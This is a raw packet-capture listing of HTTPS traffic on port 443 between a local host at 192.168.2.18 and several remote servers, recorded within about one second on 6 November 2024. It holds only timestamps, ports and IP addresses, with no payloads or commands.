                                                                                                                                              Nov 6, 2024 16:55:59.194179058 CET49825443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.194188118 CET49823443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:55:59.194252968 CET44349823188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.194461107 CET49825443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.194519043 CET44349825188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.194669962 CET49823443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:55:59.194669962 CET49825443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.194683075 CET44349823188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.194699049 CET44349825188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.197074890 CET44349827188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.197310925 CET49827443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.197329998 CET44349827188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.198332071 CET44349827188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.198419094 CET49827443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.198703051 CET49827443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.198766947 CET49827443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.198774099 CET44349827188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.198780060 CET44349827188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.199865103 CET44349824188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.200051069 CET49824443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.200066090 CET44349824188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.201066017 CET44349824188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.201154947 CET49824443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.201380014 CET49824443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.201436996 CET44349824188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.201482058 CET49824443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.205513954 CET44349826188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.205791950 CET49826443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.205799103 CET44349826188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.206815958 CET44349826188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.206902027 CET49826443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.207329988 CET49826443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.207385063 CET44349826188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.207555056 CET49826443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.207562923 CET44349826188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.211136103 CET4434982113.33.187.120192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.211149931 CET4434982113.33.187.120192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.211296082 CET49821443192.168.2.1813.33.187.120
                                                                                                                                              Nov 6, 2024 16:55:59.211332083 CET4434982113.33.187.120192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.211345911 CET4434982113.33.187.120192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.212537050 CET49821443192.168.2.1813.33.187.120
                                                                                                                                              Nov 6, 2024 16:55:59.212546110 CET4434982113.33.187.120192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.212553978 CET4434982113.33.187.120192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.212920904 CET49821443192.168.2.1813.33.187.120
                                                                                                                                              Nov 6, 2024 16:55:59.212981939 CET4434982113.33.187.120192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.212990999 CET4434982113.33.187.120192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.213016033 CET44349828188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.213104010 CET49821443192.168.2.1813.33.187.120
                                                                                                                                              Nov 6, 2024 16:55:59.213113070 CET4434982113.33.187.120192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.213121891 CET4434982113.33.187.120192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.213251114 CET49821443192.168.2.1813.33.187.120
                                                                                                                                              Nov 6, 2024 16:55:59.213255882 CET4434982113.33.187.120192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.213263035 CET4434982113.33.187.120192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.214077950 CET49828443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.214092970 CET44349828188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.214485884 CET49821443192.168.2.1813.33.187.120
                                                                                                                                              Nov 6, 2024 16:55:59.215605974 CET44349828188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.215682983 CET49828443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.215965986 CET49828443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.216027021 CET44349828188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.216101885 CET49828443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.216108084 CET44349828188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.226790905 CET44349829188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.227032900 CET49829443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.227057934 CET44349829188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.228096962 CET44349829188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.228172064 CET49829443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.228427887 CET49829443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.228499889 CET44349829188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.228574038 CET49829443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.228583097 CET44349829188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.233098030 CET44349819140.82.121.4192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.233304024 CET44349819140.82.121.4192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.233342886 CET44349819140.82.121.4192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.233370066 CET49819443192.168.2.18140.82.121.4
                                                                                                                                              Nov 6, 2024 16:55:59.233402014 CET49819443192.168.2.18140.82.121.4
                                                                                                                                              Nov 6, 2024 16:55:59.233757019 CET49819443192.168.2.18140.82.121.4
                                                                                                                                              Nov 6, 2024 16:55:59.233774900 CET44349819140.82.121.4192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.243149042 CET49825443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.243149042 CET49827443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.243149042 CET49823443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:55:59.243184090 CET44349827188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.243221998 CET49824443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.243247032 CET44349824188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.243813992 CET49831443192.168.2.18185.199.110.133
                                                                                                                                              Nov 6, 2024 16:55:59.243848085 CET44349831185.199.110.133192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.243942022 CET49831443192.168.2.18185.199.110.133
                                                                                                                                              Nov 6, 2024 16:55:59.244227886 CET49831443192.168.2.18185.199.110.133
                                                                                                                                              Nov 6, 2024 16:55:59.244244099 CET44349831185.199.110.133192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.259054899 CET49828443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.259059906 CET49826443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.275043964 CET49829443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.291055918 CET49824443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.291060925 CET49827443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.326946974 CET4434982113.33.187.120192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.326960087 CET4434982113.33.187.120192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.326977968 CET4434982113.33.187.120192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.326987982 CET4434982113.33.187.120192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.327029943 CET4434982113.33.187.120192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.327044964 CET49821443192.168.2.1813.33.187.120
                                                                                                                                              Nov 6, 2024 16:55:59.327055931 CET4434982113.33.187.120192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.327172041 CET49821443192.168.2.1813.33.187.120
                                                                                                                                              Nov 6, 2024 16:55:59.327172041 CET49821443192.168.2.1813.33.187.120
                                                                                                                                              Nov 6, 2024 16:55:59.327770948 CET4434982113.33.187.120192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.327822924 CET4434982113.33.187.120192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.327842951 CET49821443192.168.2.1813.33.187.120
                                                                                                                                              Nov 6, 2024 16:55:59.327850103 CET4434982113.33.187.120192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.327900887 CET49821443192.168.2.1813.33.187.120
                                                                                                                                              Nov 6, 2024 16:55:59.328453064 CET4434982113.33.187.120192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.328469992 CET4434982113.33.187.120192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.328547955 CET49821443192.168.2.1813.33.187.120
                                                                                                                                              Nov 6, 2024 16:55:59.328556061 CET4434982113.33.187.120192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.371164083 CET49821443192.168.2.1813.33.187.120
                                                                                                                                              Nov 6, 2024 16:55:59.377984047 CET4434982113.33.187.120192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.378004074 CET4434982113.33.187.120192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.378129005 CET49821443192.168.2.1813.33.187.120
                                                                                                                                              Nov 6, 2024 16:55:59.378142118 CET4434982113.33.187.120192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.378333092 CET49821443192.168.2.1813.33.187.120
                                                                                                                                              Nov 6, 2024 16:55:59.442341089 CET4434982113.33.187.120192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.442375898 CET4434982113.33.187.120192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.442543983 CET49821443192.168.2.1813.33.187.120
                                                                                                                                              Nov 6, 2024 16:55:59.442543983 CET49821443192.168.2.1813.33.187.120
                                                                                                                                              Nov 6, 2024 16:55:59.442555904 CET4434982113.33.187.120192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.442645073 CET49821443192.168.2.1813.33.187.120
                                                                                                                                              Nov 6, 2024 16:55:59.442976952 CET4434982113.33.187.120192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.442994118 CET4434982113.33.187.120192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.443136930 CET49821443192.168.2.1813.33.187.120
                                                                                                                                              Nov 6, 2024 16:55:59.443145990 CET4434982113.33.187.120192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.443325043 CET49821443192.168.2.1813.33.187.120
                                                                                                                                              Nov 6, 2024 16:55:59.443896055 CET4434982113.33.187.120192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.443913937 CET4434982113.33.187.120192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.444190979 CET49821443192.168.2.1813.33.187.120
                                                                                                                                              Nov 6, 2024 16:55:59.444216967 CET4434982113.33.187.120192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.444327116 CET49821443192.168.2.1813.33.187.120
                                                                                                                                              Nov 6, 2024 16:55:59.444542885 CET4434982113.33.187.120192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.444559097 CET4434982113.33.187.120192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.444668055 CET49821443192.168.2.1813.33.187.120
                                                                                                                                              Nov 6, 2024 16:55:59.444675922 CET4434982113.33.187.120192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.444818020 CET49821443192.168.2.1813.33.187.120
                                                                                                                                              Nov 6, 2024 16:55:59.447573900 CET4434982113.33.187.120192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.447652102 CET49821443192.168.2.1813.33.187.120
                                                                                                                                              Nov 6, 2024 16:55:59.447659969 CET4434982113.33.187.120192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.447720051 CET49821443192.168.2.1813.33.187.120
                                                                                                                                              Nov 6, 2024 16:55:59.448029041 CET4434982113.33.187.120192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.448048115 CET4434982113.33.187.120192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.450716019 CET49821443192.168.2.1813.33.187.120
                                                                                                                                              Nov 6, 2024 16:55:59.450737000 CET4434982113.33.187.120192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.493366003 CET4434982113.33.187.120192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.493388891 CET4434982113.33.187.120192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.496972084 CET49821443192.168.2.1813.33.187.120
                                                                                                                                              Nov 6, 2024 16:55:59.496992111 CET4434982113.33.187.120192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.550717115 CET49821443192.168.2.1813.33.187.120
                                                                                                                                              Nov 6, 2024 16:55:59.557612896 CET4434982113.33.187.120192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.557627916 CET4434982113.33.187.120192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.557698965 CET4434982113.33.187.120192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.557710886 CET4434982113.33.187.120192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.557825089 CET49821443192.168.2.1813.33.187.120
                                                                                                                                              Nov 6, 2024 16:55:59.557825089 CET49821443192.168.2.1813.33.187.120
                                                                                                                                              Nov 6, 2024 16:55:59.562702894 CET49821443192.168.2.1813.33.187.120
                                                                                                                                              Nov 6, 2024 16:55:59.562731981 CET4434982113.33.187.120192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.593566895 CET44349825188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.593621016 CET44349825188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.593650103 CET44349825188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.593678951 CET44349825188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.593734026 CET44349825188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.593763113 CET44349825188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.593807936 CET44349825188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.593818903 CET49825443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.593836069 CET44349825188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.593852997 CET49825443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.593913078 CET49825443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.594192028 CET44349825188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.643064976 CET49825443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.709441900 CET44349825188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.709505081 CET44349825188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.709532976 CET44349825188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.709562063 CET44349825188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.709588051 CET49825443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.709604025 CET44349825188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.709626913 CET49825443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.709753990 CET44349825188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.709781885 CET44349825188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.709831953 CET49825443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.709839106 CET44349825188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.709887028 CET49825443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.710478067 CET44349825188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.710608959 CET44349825188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.710664034 CET49825443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.713385105 CET49825443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.713406086 CET44349825188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.715400934 CET49832443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.715440989 CET44349832188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.715514898 CET49832443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.717220068 CET44349827188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.717257023 CET44349827188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.717291117 CET44349827188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.717314959 CET44349827188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.717315912 CET49827443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.717339993 CET44349827188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.717358112 CET49827443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.717369080 CET44349827188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.717391968 CET44349827188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.717413902 CET44349827188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.717422962 CET49827443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.717428923 CET44349827188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.717447996 CET49827443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.717746973 CET49832443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.717765093 CET44349832188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.718082905 CET44349827188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.718631029 CET49827443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.718638897 CET44349827188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.733560085 CET44349823188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.733633041 CET44349823188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.733752012 CET49823443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:55:59.735423088 CET49823443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:55:59.735433102 CET44349823188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.769411087 CET44349826188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.769464970 CET44349826188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.769499063 CET44349826188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.769527912 CET49826443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.769536018 CET44349826188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.769548893 CET44349826188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.769579887 CET49826443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.769905090 CET44349829188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.769954920 CET44349829188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.770008087 CET44349829188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.770047903 CET44349829188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.770047903 CET49829443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.770066977 CET44349826188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.770070076 CET44349829188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.770086050 CET49829443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.770096064 CET44349826188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.770107985 CET49826443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.770112991 CET44349829188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.770117998 CET44349826188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.770137072 CET44349829188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.770148039 CET49829443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.770157099 CET44349829188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.770165920 CET49826443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.770174026 CET44349826188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.770194054 CET49829443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.770200968 CET44349829188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.770641088 CET44349829188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.770675898 CET49829443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.770682096 CET44349829188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.771306992 CET49827443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.785464048 CET44349824188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.785520077 CET44349824188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.785548925 CET44349824188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.785578012 CET44349824188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.785597086 CET49824443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.785612106 CET44349824188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.785645008 CET44349824188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.785645962 CET49824443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.785676956 CET44349824188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.785686970 CET49824443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.785692930 CET44349824188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.785727978 CET49824443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.785732985 CET44349824188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.818034887 CET49829443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.818370104 CET49826443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.818388939 CET44349826188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.834039927 CET49824443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.834058046 CET44349824188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.834393978 CET44349827188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.834465027 CET44349827188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.834495068 CET44349827188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.834506035 CET49827443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.834520102 CET44349827188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.834564924 CET49827443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.834570885 CET44349827188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.835037947 CET44349827188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.835066080 CET44349827188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.835091114 CET49827443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.835098982 CET44349827188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.835141897 CET49827443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.835525990 CET44349827188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.835598946 CET44349827188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.835624933 CET44349827188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.835642099 CET49827443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.835649014 CET44349827188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.835691929 CET49827443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.836503983 CET44349827188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.836563110 CET44349827188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.836592913 CET44349827188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.836605072 CET49827443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.836613894 CET44349827188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.836652040 CET49827443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.836658955 CET44349827188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.837311983 CET44349827188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.837363005 CET49827443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.837519884 CET49827443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.837532043 CET44349827188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.837934971 CET49833443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.837970972 CET44349833188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.838030100 CET49833443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.838648081 CET49833443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:59.838659048 CET44349833188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.851855993 CET44349831185.199.110.133192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.852113962 CET49831443192.168.2.18185.199.110.133
                                                                                                                                              Nov 6, 2024 16:55:59.852143049 CET44349831185.199.110.133192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.853184938 CET44349831185.199.110.133192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.853256941 CET49831443192.168.2.18185.199.110.133
                                                                                                                                              Nov 6, 2024 16:55:59.854181051 CET49831443192.168.2.18185.199.110.133
                                                                                                                                              Nov 6, 2024 16:55:59.854237080 CET44349831185.199.110.133192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.854336977 CET49831443192.168.2.18185.199.110.133
